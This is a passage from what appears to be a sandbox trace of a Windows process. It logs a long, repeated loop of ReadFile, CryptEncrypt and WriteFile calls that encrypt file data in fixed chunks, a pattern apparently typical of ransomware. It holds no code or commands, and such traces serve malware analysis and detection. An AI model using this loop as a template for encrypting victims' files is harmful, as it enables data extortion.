lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.217] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.217] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.217] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.217] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.217] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.217] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.217] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.217] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.218] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.218] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.218] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.218] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.218] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.218] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.218] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.218] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.218] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.218] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.218] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.219] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.219] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.219] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.219] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.219] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.219] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.219] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.219] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.219] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.219] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.219] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.220] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.220] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.220] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.220] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.220] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.220] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.220] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.220] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.220] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.220] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.224] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.224] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.224] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.224] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.224] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.224] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.224] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.225] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.225] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.225] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.225] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.226] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.226] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.226] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.226] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.226] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.226] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.226] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.226] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.226] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.226] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.226] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.226] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.227] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.227] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.227] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.227] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.227] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.227] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.227] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.227] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.227] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.227] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.227] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.228] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.228] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.228] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.228] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.228] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.228] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.228] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.228] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.228] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.228] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.228] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.228] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.229] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.229] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.229] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.229] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.229] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.229] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.229] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.229] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.229] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.229] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.229] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.229] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, 